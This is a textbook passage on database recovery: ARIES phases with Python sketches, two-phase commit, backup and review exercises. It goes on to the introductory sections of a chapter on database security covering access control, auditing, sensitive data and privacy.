Transaction Table, then the entry for T is deleted from that table. If some other type
of log record is encountered for a transaction T′, then an entry for T′ is inserted into
the Transaction Table, if not already present, and the last LSN field is modified. If
the log record corresponds to a change for page P, then an entry would be made for
page P (if not present in the table) and the associated LSN field would be modified.
When the analysis phase is complete, the necessary information for REDO and
UNDO has been compiled in the tables.
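
A sketch of this analysis pass, under the same assumptions as before (list-indexed LSNs and tuple-shaped records such as ('update', tran_id, page_id, before_image, after_image)); for simplicity it also assumes that no other records fall between the begin_checkpoint and end_checkpoint records, as in Figure 5.

    def analysis(log, begin_checkpoint_lsn):
        transaction_table, dirty_page_table = {}, {}
        for lsn in range(begin_checkpoint_lsn, len(log)):
            rec = log[lsn]
            kind = rec[0]
            if kind == 'end_checkpoint':
                _, tt_snapshot, dpt_snapshot = rec
                transaction_table.update(tt_snapshot)   # start from the saved tables
                dirty_page_table.update(dpt_snapshot)
            elif kind == 'end':
                transaction_table.pop(rec[1], None)     # rec[1] is the transaction id
            elif kind in ('update', 'commit', 'abort', 'undo'):
                tran_id = rec[1]
                status = 'commit' if kind == 'commit' else 'in progress'
                transaction_table[tran_id] = (status, lsn)   # track status and last LSN
                if kind == 'update':
                    page_id = rec[2]
                    # keep only the earliest LSN that dirtied the page (recLSN)
                    dirty_page_table.setdefault(page_id, lsn)
        return transaction_table, dirty_page_table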

The REDO phase follows next. To reduce the amount of unnecessary work, ARIES
starts redoing at a point in the log where it knows (for sure) that previous changes
to dirty pages have already been applied to the database on disk. It can determine this
by finding the smallest LSN, M, of all the dirty pages in the Dirty Page Table, which
indicates the log position where ARIES needs to start the REDO phase. Any changes
corresponding to an LSN < M, for redoable transactions, must have already been propagated to disk or already been overwritten in the buffer; otherwise, those dirty pages with that LSN would be in the buffer (and the Dirty Page Table). So, REDO starts at the log record with LSN = M and scans forward to the end of the log. For each change recorded in the log, the REDO algorithm would verify whether or not the change has to be reapplied. For example, if a change recorded in the log pertains to page P that is not in the Dirty Page Table, then this change is already on disk and does not need to be reapplied. Or, if a change recorded in the log (with LSN = N, say) pertains to page P and the Dirty Page Table contains an entry for P with LSN greater than N, then the change is already present. If neither of these two conditions holds, page P is read from disk and the LSN stored on that page, LSN(P), is compared with N. If N ≤ LSN(P), then the change has already been applied and the page does not need to be rewritten to disk.

Once the REDO phase is finished, the database is in the exact state that it was in when the crash occurred. The set of active transactions—called the undo_set—has been identified in the Transaction Table during the analysis phase. Now, the UNDO phase proceeds by scanning backward from the end of the log and undoing the appropriate actions. A compensating log record is written for each action that is undone. The UNDO reads backward in the log until every action of the set of transactions in the undo_set has been undone. When this is completed, the recovery process is finished and normal processing can begin again.
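
The REDO-skipping tests and the backward UNDO scan just described can be sketched as follows. Here read_page, write_page, and append_clr stand for buffer-manager and logging hooks that are assumed for the sketch, and pages are assumed to expose contents and page_lsn attributes; none of these names comes from the text.

    def redo_phase(log, dirty_page_table, read_page, write_page):
        if not dirty_page_table:
            return
        start = min(dirty_page_table.values())        # M, the smallest recLSN
        for lsn in range(start, len(log)):
            rec = log[lsn]
            if rec[0] != 'update':
                continue
            _, tran_id, page_id, before_image, after_image = rec
            if page_id not in dirty_page_table:       # change already on disk
                continue
            if dirty_page_table[page_id] > lsn:       # page was dirtied only later
                continue
            page = read_page(page_id)
            if lsn <= page.page_lsn:                  # change already applied
                continue
            page.contents = after_image               # reapply and stamp the page
            page.page_lsn = lsn
            write_page(page_id, page)

    def undo_phase(log, undo_set, read_page, write_page, append_clr):
        # Scan backward, undoing every update of the transactions in undo_set
        # and writing a compensation log record (CLR) for each undone action.
        for lsn in range(len(log) - 1, -1, -1):
            rec = log[lsn]
            if rec[0] == 'update' and rec[1] in undo_set:
                _, tran_id, page_id, before_image, after_image = rec
                page = read_page(page_id)
                page.contents = before_image          # restore the before image
                write_page(page_id, page)
                append_clr(tran_id, page_id, before_image)
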
Consider the recovery example shown in Figure 5. There are three transactions: T1, T2, and T3. T1 updates page C, T2 updates pages B and C, and T3 updates page A.

Figure 5 An example of recovery in ARIES. (a) The log at the point of crash. (b) The Transaction and Dirty Page Tables at the time of checkpoint. (c) The Transaction and Dirty Page Tables after the analysis phase.

Figure 5(a) shows the partial contents of the log, and Figure 5(b) shows the contents of the Transaction Table and Dirty Page Table. Now, suppose that a crash occurs at this point. Since a checkpoint has occurred, the address of the associated begin_checkpoint record is retrieved, which is location 4. The analysis phase starts from location 4 until it reaches the end. The end_checkpoint record would contain the Transaction Table and Dirty Page Table in Figure 5(b), and the analysis phase will further reconstruct these tables. When the analysis phase encounters log record 6, a new entry for transaction T3 is made in the Transaction Table and a new entry for page A is made in the Dirty Page Table. After log record 8 is analyzed, the status of transaction T2 is changed to committed in the Transaction Table. Figure 5(c) shows the two tables after the analysis phase.

For the REDO phase, the smallest LSN in the Dirty Page Table is 1. Hence the REDO will start at log record 1 and proceed with the REDO of updates. The LSNs {1, 2, 6, 7} corresponding to the updates for pages C, B, A, and C, respectively, are not less than the LSNs of those pages (as shown in the Dirty Page Table). So those data pages will be read again and the updates reapplied from the log (assuming the actual LSNs stored on those data pages are less than the corresponding log entries). At this point, the REDO phase is finished and the UNDO phase starts. From the Transaction Table (Figure 5(c)), UNDO is applied only to the active transaction T3. The UNDO phase starts at log entry 6 (the last update for T3) and proceeds backward in the log. The backward chain of updates for transaction T3 (only log record 6 in this example) is followed and undone.

6 Recovery in Multidatabase Systems

So far, we have implicitly assumed that a transaction accesses a single database. In some cases, a single transaction, called a multidatabase transaction, may require access to multiple databases. These databases may even be stored on different types of DBMSs; for example, some DBMSs may be relational, whereas others are object-oriented, hierarchical, or network DBMSs. In such a case, each DBMS involved in the multidatabase transaction may have its own recovery technique and transaction manager separate from those of the other DBMSs. This situation is somewhat similar to the case of a distributed database management system, where parts of the database reside at different sites that are connected by a communication network.

To maintain the atomicity of a multidatabase transaction, it is necessary to have a two-level recovery mechanism. A global recovery manager, or coordinator, is needed to maintain information needed for recovery, in addition to the local recovery managers and the information they maintain (log, tables). The coordinator usually follows a protocol called the two-phase commit protocol, whose two phases can be stated as follows:

■ Phase 1. When all participating databases signal the coordinator that the part of the multidatabase transaction involving each has concluded, the coordinator sends a message prepare for commit to each participant to get ready for committing the transaction. Each participating database receiving that message will force-write all log records and needed information for local recovery to disk and then send a ready to commit or OK signal to the coordinator. If the force-writing to disk fails or the local transaction cannot commit for some reason, the participating database sends a cannot commit or not OK signal to the coordinator. If the coordinator does not receive a reply from the database within a certain timeout interval, it assumes a not OK response.

■ Phase 2. If all participating databases reply OK, and the coordinator's vote is also OK, the transaction is successful, and the coordinator sends a commit signal for the transaction to the participating databases. Because all the local effects of the transaction and information needed for local recovery have been recorded in the logs of the participating databases, recovery from failure is now possible. Each participating database completes transaction commit by writing a [commit] entry for the transaction in the log and permanently updating the database if needed. On the other hand, if one or more of the participating databases or the coordinator have a not OK response, the transaction has failed, and the coordinator sends a message to roll back or UNDO the local effect of the transaction to each participating database. This is done by undoing the transaction operations, using the log.

The net effect of the two-phase commit protocol is that either all participating databases commit the effect of the transaction or none of them do. In case any of the participants—or the coordinator—fails, it is always possible to recover to a state where either the transaction is committed or it is rolled back. A failure during or before Phase 1 usually requires the transaction to be rolled back, whereas a failure during Phase 2 means that a successful transaction can recover and commit.

7 Database Backup and Recovery from Catastrophic Failures

So far, all the techniques we have discussed apply to noncatastrophic failures. A key assumption has been that the system log is maintained on the disk and is not lost as a result of the failure. Similarly, the shadow directory must be stored on disk to allow recovery when shadow paging is used. The recovery techniques we have discussed use the entries in the system log or the shadow directory to recover from failure by bringing the database back to a consistent state.

The recovery manager of a DBMS must also be equipped to handle more catastrophic failures such as disk crashes. The main technique used to handle such crashes is a database backup, in which the whole database and the log are periodically copied onto a cheap storage medium such as magnetic tapes or other large capacity offline storage devices. In case of a catastrophic system failure, the latest backup copy can be reloaded from the tape to the disk, and the system can be restarted. Data from critical applications such as banking, insurance, stock market, and other databases is periodically backed up in its entirety and moved to physically separate safe locations. Subterranean storage vaults have been used to protect such data from flood, storm, earthquake, or fire damage. Events like the 9/11 terrorist attack in New York (in 2001) and the Katrina hurricane disaster in New Orleans (in 2005) have created a greater awareness of disaster recovery of business-critical databases.

To avoid losing all the effects of transactions that have been executed since the last backup, it is customary to back up the system log at more frequent intervals than full database backup by periodically copying it to magnetic tape. The system log is usually substantially smaller than the database itself and hence can be backed up more frequently. Therefore, users do not lose all transactions they have performed since the last database backup. All committed transactions recorded in the portion of the system log that has been backed up to tape can have their effect on the database redone. A new log is started after each database backup. Hence, to recover from disk failure, the database is first recreated on disk from its latest backup copy on tape. Following that, the effects of all the committed transactions whose operations have been recorded in the backed-up copies of the system log are reconstructed.

8 Summary

In this chapter we discussed the techniques for recovery from transaction failures. The main goal of recovery is to ensure the atomicity property of a transaction.
If a transaction fails before completing its execution, the recovery mechanism has to make sure that the transaction has no lasting effects on the database. First we gave an informal outline for a recovery process and then we discussed system concepts for recovery. These included a discussion of caching, in-place updating versus shadowing, before and after images of a data item, UNDO versus REDO recovery operations, steal/no-steal and force/no-force policies, system checkpointing, and the write-ahead logging protocol.

Next we discussed two different approaches to recovery: deferred update and immediate update. Deferred update techniques postpone any actual updating of the database on disk until a transaction reaches its commit point. The transaction force-writes the log to disk before recording the updates in the database. This approach, when used with certain concurrency control methods, is designed never to require transaction rollback, and recovery simply consists of redoing the operations of transactions committed after the last checkpoint from the log. The disadvantage is that too much buffer space may be needed, since updates are kept in the buffers and are not applied to disk until a transaction commits. Deferred update can lead to a recovery algorithm known as NO-UNDO/REDO. Immediate update techniques may apply changes to the database on disk before the transaction reaches a successful conclusion. Any changes applied to the database must first be recorded in the log and force-written to disk so that these operations can be undone if necessary. We also gave an overview of a recovery algorithm for immediate update known as UNDO/REDO. Another algorithm, known as UNDO/NO-REDO, can also be developed for immediate update if all transaction actions are recorded in the database before commit.

We discussed the shadow paging technique for recovery, which keeps track of old database pages by using a shadow directory. This technique, which is classified as NO-UNDO/NO-REDO, does not require a log in single-user systems but still needs the log for multiuser systems. We also presented ARIES, a specific recovery scheme used in many of IBM's relational database products. Then we discussed the two-phase commit protocol, which is used for recovery from failures involving multidatabase transactions. Finally, we discussed recovery from catastrophic failures, which is typically done by backing up the database and the log to tape. The log can be backed up more frequently than the database, and the backup log can be used to redo operations starting from the last database backup.

Review Questions

1. Discuss the different types of transaction failures. What is meant by catastrophic failure?

2. Discuss the actions taken by the read_item and write_item operations on a database.

3. What is the system log used for? What are the typical kinds of entries in a system log? What are checkpoints, and why are they important? What are transaction commit points, and why are they important?

4. How are buffering and caching techniques used by the recovery subsystem?

5. What are the before image (BFIM) and after image (AFIM) of a data item? What is the difference between in-place updating and shadowing, with respect to their handling of BFIM and AFIM?

6. What are UNDO-type and REDO-type log entries?

7. Describe the write-ahead logging protocol.

8. Identify three typical lists of transactions that are maintained by the recovery subsystem.

9. What is meant by transaction rollback? What is meant by cascading rollback? Why do practical recovery methods use protocols that do not permit cascading rollback? Which recovery techniques do not require any rollback?

10. Discuss the UNDO and REDO operations and the recovery techniques that use each.

11. Discuss the deferred update technique of recovery. What are the advantages and disadvantages of this technique? Why is it called the NO-UNDO/REDO method?

12. How can recovery handle transaction operations that do not affect the database, such as the printing of reports by a transaction?

13. Discuss the immediate update recovery technique in both single-user and multiuser environments. What are the advantages and disadvantages of immediate update?

14. What is the difference between the UNDO/REDO and the UNDO/NO-REDO algorithms for recovery with immediate update? Develop the outline for an UNDO/NO-REDO algorithm.

15. Describe the shadow paging recovery technique. Under what circumstances does it not require a log?

16. Describe the three phases of the ARIES recovery method.

17. What are log sequence numbers (LSNs) in ARIES? How are they used? What information do the Dirty Page Table and Transaction Table contain? Describe how fuzzy checkpointing is used in ARIES.

Figure 6 A sample schedule and its corresponding log: the log entries ([start_transaction, ...], [read_item, ...], [write_item, ...], and [commit, ...] records, plus a [checkpoint] record) of transactions T1, T2, T3, and T4, up to the point of the system crash.

18. What do the terms steal/no-steal and force/no-force mean with regard to buffer management for transaction processing?

19. Describe the two-phase commit protocol for multidatabase transactions.

20. Discuss how disaster recovery from catastrophic failures is handled.

Exercises

21. Suppose that the system crashes before the [read_item, T3, A] entry is written to the log in Figure 1(b). Will that make any difference in the recovery process?

22. Suppose that the system crashes before the [write_item, T2, D, 25, 26] entry is written to the log in Figure 1(b). Will that make any difference in the recovery process?

23. Figure 6 shows the log corresponding to a particular schedule at the point of a system crash for four transactions T1, T2, T3, and T4. Suppose that we use the immediate update protocol with checkpointing. Describe the recovery process from the system crash. Specify which transactions are rolled back, which operations in the log are redone and which (if any) are undone, and whether any cascading rollback takes place.

24. Suppose that we use the deferred update protocol for the example in Figure 6. Show how the log would be different in the case of deferred update by removing the unnecessary log entries; then describe the recovery process, using your modified log. Assume that only REDO operations are applied, and specify which operations in the log are redone and which are ignored.

25. How does checkpointing in ARIES differ from checkpointing as described in Section 1.4?

26. How are log sequence numbers used by ARIES to reduce the amount of REDO work needed for recovery? Illustrate with an example using the information shown in Figure 5.
You can make your own assumptions as to when a page is written to disk.

27. What implications would a no-steal/force buffer management policy have on checkpointing and recovery?

Choose the correct answer for each of the following multiple-choice questions:

28. Incremental logging with deferred updates implies that the recovery system must necessarily
a. store the old value of the updated item in the log.
b. store the new value of the updated item in the log.
c. store both the old and new value of the updated item in the log.
d. store only the Begin Transaction and Commit Transaction records in the log.

29. The write-ahead logging (WAL) protocol simply means that
a. writing of a data item should be done ahead of any logging operation.
b. the log record for an operation should be written before the actual data is written.
c. all log records should be written before a new transaction begins execution.
d. the log never needs to be written to disk.

30. In case of transaction failure under a deferred update incremental logging scheme, which of the following will be needed?
a. an undo operation
b. a redo operation
c. an undo and redo operation
d. none of the above

31. For incremental logging with immediate updates, a log record for a transaction would contain
a. a transaction name, a data item name, and the old and new value of the item.
b. a transaction name, a data item name, and the old value of the item.
c. a transaction name, a data item name, and the new value of the item.
d. a transaction name and a data item name.

32. For correct behavior during recovery, undo and redo operations must be
a. commutative.
b. associative.
c. idempotent.
d. distributive.

33. When a failure occurs, the log is consulted and each operation is either undone or redone. This is a problem because
a. searching the entire log is time consuming.
b. many redos are unnecessary.
c. both (a) and (b).
d. none of the above.

34. When using a log-based recovery scheme, it might improve performance as well as providing a recovery mechanism by
a. writing the log records to disk when each transaction commits.
b. writing the appropriate log records to disk during the transaction's execution.
c. waiting to write the log records until multiple transactions commit and writing them as a batch.
d. never writing the log records to disk.

35. There is a possibility of a cascading rollback when
a. a transaction writes items that have been written only by a committed transaction.
b. a transaction writes an item that is previously written by an uncommitted transaction.
c. a transaction reads an item that is previously written by an uncommitted transaction.
d. both (b) and (c).

36. To cope with media (disk) failures, it is necessary
a. for the DBMS to only execute transactions in a single user environment.
b. to keep a redundant copy of the database.
c. to never abort a transaction.
d. all of the above.

37. If the shadowing approach is used for flushing a data item back to disk, then
a. the item is written to disk only after the transaction commits.
b. the item is written to a different location on disk.
c. the item is written to disk before the transaction commits.
d. the item is written to the same disk location from which it was read.

Selected Bibliography

The books by Bernstein et al. (1987) and Papadimitriou (1986) are devoted to the theory and principles of concurrency control and recovery.
The book by Gray and Reuter (1993) is an encyclopedic work on concurrency control, recovery, and other transaction-processing issues.

Verhofstad (1978) presents a tutorial and survey of recovery techniques in database systems. Categorizing algorithms based on their UNDO/REDO characteristics is discussed in Haerder and Reuter (1983) and in Bernstein et al. (1983). Gray (1978) discusses recovery, along with other system aspects of implementing operating systems for databases. The shadow paging technique is discussed in Lorie (1977), Verhofstad (1978), and Reuter (1980). Gray et al. (1981) discuss the recovery mechanism in SYSTEM R. Lockemann and Knutsen (1968), Davies (1973), and Bjork (1973) are early papers that discuss recovery. Chandy et al. (1975) discuss transaction rollback. Lilien and Bhargava (1985) discuss the concept of integrity block and its use to improve the efficiency of recovery. Recovery using write-ahead logging is analyzed in Jhingran and Khedkar (1992) and is used in the ARIES system (Mohan et al. 1992). More recent work on recovery includes compensating transactions (Korth et al. 1990) and main memory database recovery (Kumar 1991). The ARIES recovery algorithms (Mohan et al. 1992) have been quite successful in practice. Franklin et al. (1992) discusses recovery in the EXODUS system. Two books by Kumar and Hsu (1998) and Kumar and Song (1998) discuss recovery in detail and contain descriptions of recovery methods used in a number of existing relational database products. Examples of page replacement strategies that are specific for databases are discussed in Chou and DeWitt (1985) and Pazos et al. (2006).

Database Security

This chapter discusses techniques for securing databases against a variety of threats. It also presents schemes of providing access privileges to authorized users. Some of the security threats to databases—such as SQL Injection—will be presented. At the end of the chapter we also summarize how a commercial RDBMS—specifically, the Oracle system—provides different types of security. We start in Section 1 with an introduction to security issues and the threats to databases, and we give an overview of the control measures that are covered in the rest of this chapter. We also comment on the relationship between data security and privacy as it applies to personal information. Section 2 discusses the mechanisms used to grant and revoke privileges in relational database systems and in SQL, mechanisms that are often referred to as discretionary access control. In Section 3, we present an overview of the mechanisms for enforcing multiple levels of security—a particular concern in database system security that is known as mandatory access control. Section 3 also introduces the more recently developed strategies of role-based access control, and label-based and row-based security. Section 3 also provides a brief discussion of XML access control. Section 4 discusses a major threat to databases called SQL Injection, and discusses some of the proposed preventive measures against it. Section 5 briefly discusses the security problem in statistical databases. Section 6 introduces the topic of flow control and mentions problems associated with covert channels. Section 7 provides a brief summary of encryption and symmetric key and asymmetric (public) key infrastructure schemes. It also discusses digital certificates.
Section 8 introduces privacy-preserving techniques, and Section 9 presents the current challenges to database security. In Section 10, we discuss Oracle label-based security. Finally, Section 11 summarizes the chapter. Readers who are interested only in basic database security mechanisms will find it sufficient to cover the material in Sections 1 and 2.

From Chapter 24 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-Wesley. All rights reserved.

1 Introduction to Database Security Issues1

1.1 Types of Security

Database security is a broad area that addresses many issues, including the following:

■ Various legal and ethical issues regarding the right to access certain information—for example, some information may be deemed to be private and cannot be accessed legally by unauthorized organizations or persons. In the United States, there are numerous laws governing privacy of information.

■ Policy issues at the governmental, institutional, or corporate level as to what kinds of information should not be made publicly available—for example, credit ratings and personal medical records.

■ System-related issues such as the system levels at which various security functions should be enforced—for example, whether a security function should be handled at the physical hardware level, the operating system level, or the DBMS level.

■ The need in some organizations to identify multiple security levels and to categorize the data and users based on these classifications—for example, top secret, secret, confidential, and unclassified. The security policy of the organization with respect to permitting access to various classifications of data must be enforced.

Threats to Databases. Threats to databases can result in the loss or degradation of some or all of the following commonly accepted security goals: integrity, availability, and confidentiality.

■ Loss of integrity. Database integrity refers to the requirement that information be protected from improper modification. Modification of data includes creation, insertion, updating, changing the status of data, and deletion. Integrity is lost if unauthorized changes are made to the data by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions.

■ Loss of availability. Database availability refers to making objects available to a human user or a program to which they have a legitimate right.

■ Loss of confidentiality. Database confidentiality refers to the protection of data from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from violation of the Data Privacy Act to the jeopardization of national security. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embarrassment, or legal action against the organization.

1The substantial contribution of Fariborz Farahmand and Bharath Rengarajan to this and subsequent sections in this chapter is much appreciated.

To protect databases against these types of threats, it is common to implement four kinds of control measures: access control, inference control, flow control, and encryption. We discuss each of these in this chapter.
In a multiuser database system, the DBMS must provide techniques to enable cer- tain users or user groups to access selected portions of a database without gaining access to the rest of the database. This is particularly important when a large inte- grated database is to be used by many different users within the same organization. For example, sensitive information such as employee salaries or performance reviews should be kept confidential from most of the database system’s users. A DBMS typically includes a database security and authorization subsystem that is responsible for ensuring the security of portions of a database against unauthorized access. It is now customary to refer to two types of database security mechanisms: ■ Discretionary security mechanisms. These are used to grant privileges to users, including the capability to access specific data files, records, or fields in a specified mode (such as read, insert, delete, or update). ■ Mandatory security mechanisms. These are used to enforce multilevel security by classifying the data and users into various security classes (or lev- els) and then implementing the appropriate security policy of the organiza- tion. For example, a typical security policy is to permit users at a certain classification (or clearance) level to see only the data items classified at the user’s own (or lower) classification level. An extension of this is role-based security, which enforces policies and privileges based on the concept of orga- nizational roles. We discuss discretionary security in Section 2 and mandatory and role-based secu- rity in Section 3. 1.2 Control Measures Four main control measures are used to provide security of data in databases: ■ Access control ■ Inference control ■ Flow control ■ Data encryption A security problem common to computer systems is that of preventing unautho- rized persons from accessing the system itself, either to obtain information or to make malicious changes in a portion of the database. The security mechanism of a DBMS must include provisions for restricting access to the database system as a whole. This function, called access control, is handled by creating user accounts and passwords to control the login process by the DBMS. We discuss access control tech- niques in Section 1.3. Statistical databases are used to provide statistical information or summaries of values based on various criteria. For example, a database for population statistics 838 Database Security may provide statistics based on age groups, income levels, household size, education levels, and other criteria. Statistical database users such as government statisticians or market research firms are allowed to access the database to retrieve statistical information about a population but not to access the detailed confidential informa- tion about specific individuals. Security for statistical databases must ensure that information about individuals cannot be accessed. It is sometimes possible to deduce or infer certain facts concerning individuals from queries that involve only summary statistics on groups; consequently, this must not be permitted either. This problem, called statistical database security, is discussed briefly in Section 4. The corresponding control measures are called inference control measures. Another security issue is that of flow control, which prevents information from flowing in such a way that it reaches unauthorized users. It is discussed in Section 6. 
Channels that are pathways for information to flow implicitly in ways that violate the security policy of an organization are called covert channels. We briefly discuss some issues related to covert channels in Section 6.1. A final control measure is data encryption, which is used to protect sensitive data (such as credit card numbers) that is transmitted via some type of communications network. Encryption can be used to provide additional protection for sensitive por- tions of a database as well. The data is encoded using some coding algorithm. An unauthorized user who accesses encoded data will have difficulty deciphering it, but authorized users are given decoding or decrypting algorithms (or keys) to decipher the data. Encrypting techniques that are very difficult to decode without a key have been developed for military applications. Section 7 briefly discusses encryption techniques, including popular techniques such as public key encryption, which is heavily used to support Web-based transactions against databases, and digital signa- tures, which are used in personal communications. A comprehensive discussion of security in computer systems and databases is out- side the scope of this text. We give only a brief overview of database security tech- niques here. The interested reader can refer to several of the references discussed in the Selected Bibliography at the end of this chapter for a more comprehensive dis- cussion. 1.3 Database Security and the DBA The database administrator (DBA) is the central authority for managing a data- base system. The DBA’s responsibilities include granting privileges to users who need to use the system and classifying users and data in accordance with the pol- icy of the organization. The DBA has a DBA account in the DBMS, sometimes called a system or superuser account, which provides powerful capabilities that are not made available to regular database accounts and users.2 DBA-privileged commands include commands for granting and revoking privileges to individual 2This account is similar to the root or superuser accounts that are given to computer system administra- tors, which allow access to restricted operating system commands. 839 Database Security accounts, users, or user groups and for performing the following types of actions: 1. Account creation. This action creates a new account and password for a user or a group of users to enable access to the DBMS. 2. Privilege granting. This action permits the DBA to grant certain privileges to certain accounts. 3. Privilege revocation. This action permits the DBA to revoke (cancel) certain privileges that were previously given to certain accounts. 4. Security level assignment. This action consists of assigning user accounts to the appropriate security clearance level. The DBA is responsible for the overall security of the database system. Action 1 in the preceding list is used to control access to the DBMS as a whole, whereas actions 2 and 3 are used to control discretionary database authorization, and action 4 is used to control mandatory authorization. 1.4 Access Control, User Accounts, and Database Audits Whenever a person or a group of persons needs to access a database system, the individual or group must first apply for a user account. The DBA will then create a new account number and password for the user if there is a legitimate need to access the database. The user must log in to the DBMS by entering the account number and password whenever database access is needed. 
The DBMS checks that the account number and password are valid; if they are, the user is permitted to use the DBMS and to access the database. Application programs can also be considered users and are required to log in to the database. It is straightforward to keep track of database users and their accounts and pass- words by creating an encrypted table or file with two fields: AccountNumber and Password. This table can easily be maintained by the DBMS. Whenever a new account is created, a new record is inserted into the table. When an account is can- celed, the corresponding record must be deleted from the table. The database system must also keep track of all operations on the database that are applied by a certain user throughout each login session, which consists of the sequence of database interactions that a user performs from the time of logging in to the time of logging off. When a user logs in, the DBMS can record the user’s account number and associate it with the computer or device from which the user logged in. All operations applied from that computer or device are attributed to the user’s account until the user logs off. It is particularly important to keep track of update operations that are applied to the database so that, if the database is tam- pered with, the DBA can determine which user did the tampering. To keep a record of all updates applied to the database and of particular users who applied each update, we can modify the system log. Recall that the system log includes an entry for each operation applied to the database that may be required for recovery from a transaction failure or system crash. We can expand the log 840 Database Security entries so that they also include the account number of the user and the online computer or device ID that applied each operation recorded in the log. If any tam- pering with the database is suspected, a database audit is performed, which consists of reviewing the log to examine all accesses and operations applied to the database during a certain time period. When an illegal or unauthorized operation is found, the DBA can determine the account number used to perform the operation. Database audits are particularly important for sensitive databases that are updated by many transactions and users, such as a banking database that is updated by many bank tellers. A database log that is used mainly for security purposes is sometimes called an audit trail. 1.5 Sensitive Data and Types of Disclosures Sensitivity of data is a measure of the importance assigned to the data by its owner, for the purpose of denoting its need for protection. Some databases contain only sensitive data while other databases may contain no sensitive data at all. Handling databases that fall at these two extremes is relatively easy, because these can be cov- ered by access control, which is explained in the next section. The situation becomes tricky when some of the data is sensitive while other data is not. Several factors can cause data to be classified as sensitive: 1. Inherently sensitive. The value of the data itself may be so revealing or con- fidential that it becomes sensitive—for example, a person’s salary or that a patient has HIV/AIDS. 2. From a sensitive source. The source of the data may indicate a need for secrecy—for example, an informer whose identity must be kept secret. 3. Declared sensitive. The owner of the data may have explicitly declared it as sensitive. 4. A sensitive attribute or sensitive record. 
The particular attribute or record may have been declared sensitive—for example, the salary attribute of an employee or the salary history record in a personnel database. 5. Sensitive in relation to previously disclosed data. Some data may not be sensitive by itself but will become sensitive in the presence of some other data—for example, the exact latitude and longitude information for a loca- tion where some previously recorded event happened that was later deemed sensitive. It is the responsibility of the database administrator and security administrator to collectively enforce the security policies of an organization. This dictates whether access should be permitted to a certain database attribute (also known as a table col- umn or a data element) or not for individual users or for categories of users. Several factors need to be considered before deciding whether it is safe to reveal the data. The three most important factors are data availability, access acceptability, and authenticity assurance. 1. Data availability. If a user is updating a field, then this field becomes inac- cessible and other users should not be able to view this data. This blocking is 841 Database Security only temporary and only to ensure that no user sees any inaccurate data. This is typically handled by the concurrency control mechanism. 2. Access acceptability. Data should only be revealed to authorized users. A database administrator may also deny access to a user request even if the request does not directly access a sensitive data item, on the grounds that the requested data may reveal information about the sensitive data that the user is not authorized to have. 3. Authenticity assurance. Before granting access, certain external characteris- tics about the user may also be considered. For example, a user may only be permitted access during working hours. The system may track previous queries to ensure that a combination of queries does not reveal sensitive data. The latter is particularly relevant to statistical database queries (see Section 5). The term precision, when used in the security area, refers to allowing as much as possible of the data to be available, subject to protecting exactly the subset of data that is sensitive. The definitions of security versus precision are as follows: ■ Security: Means of ensuring that data is kept safe from corruption and that access to it is suitably controlled. To provide security means to disclose only nonsensitive data, and reject any query that references a sensitive field. ■ Precision: To protect all sensitive data while disclosing as much nonsensitive data as possible. The ideal combination is to maintain perfect security with maximum precision. If we want to maintain security, some sacrifice has to be made with precision. Hence there is typically a tradeoff between security and precision. 1.6 Relationship between Information Security versus Information Privacy The rapid advancement of the use of information technology (IT) in industry, gov- ernment, and academia raises challenging questions and problems regarding the protection and use of personal information. Questions of who has what rights to information about individuals for which purposes become more important as we move toward a world in which it is technically possible to know just about anything about anyone. Deciding how to design privacy considerations in technology for the future includes philosophical, legal, and practical dimensions. 
There is a considerable overlap between issues related to access to resources (security) and issues related to appro- priate use of information (privacy). We now define the difference between security versus privacy. Security in information technology refers to many aspects of protecting a system from unauthorized use, including authentication of users, information encryption, access control, firewall policies, and intrusion detection. For our purposes here, we 842 Database Security will limit our treatment of security to the concepts associated with how well a sys- tem can protect access to information it contains. The concept of privacy goes beyond security. Privacy examines how well the use of personal information that the system acquires about a user conforms to the explicit or implicit assumptions regarding that use. From an end user perspective, privacy can be considered from two different perspectives: preventing storage of personal information versus ensuring appropriate use of personal information. For the purposes of this chapter, a simple but useful definition of privacy is the abil- ity of individuals to control the terms under which their personal information is acquired and used. In summary, security involves technology to ensure that informa- tion is appropriately protected. Security is a required building block for privacy to exist. Privacy involves mechanisms to support compliance with some basic principles and other explicitly stated policies. One basic principle is that people should be informed about information collection, told in advance what will be done with their information, and given a reasonable opportunity to approve of such use of the infor- mation. A related concept, trust, relates to both security and privacy, and is seen as increasing when it is perceived that both security and privacy are provided for. 2 Discretionary Access Control Based on Granting and Revoking Privileges The typical method of enforcing discretionary access control in a database system is based on the granting and revoking of privileges. Let us consider privileges in the context of a relational DBMS. In particular, we will discuss a system of privileges somewhat similar to the one originally developed for the SQL language. Many cur- rent relational DBMSs use some variation of this technique. The main idea is to include statements in the query language that allow the DBA and selected users to grant and revoke privileges. 2.1 Types of Discretionary Privileges In SQL2 and later versions,3 the concept of an authorization identifier is used to refer, roughly speaking, to a user account (or group of user accounts). For simplic- ity, we will use the words user or account interchangeably in place of authorization identifier. The DBMS must provide selective access to each relation in the database based on specific accounts. Operations may also be controlled; thus, having an account does not necessarily entitle the account holder to all the functionality pro- vided by the DBMS. Informally, there are two levels for assigning privileges to use the database system: ■ The account level. At this level, the DBA specifies the particular privileges that each account holds independently of the relations in the database. ■ The relation (or table) level. At this level, the DBA can control the privilege to access each individual relation or view in the database. 3Discretionary privileges were incorporated into SQL2 and are applicable to later versions of SQL. 
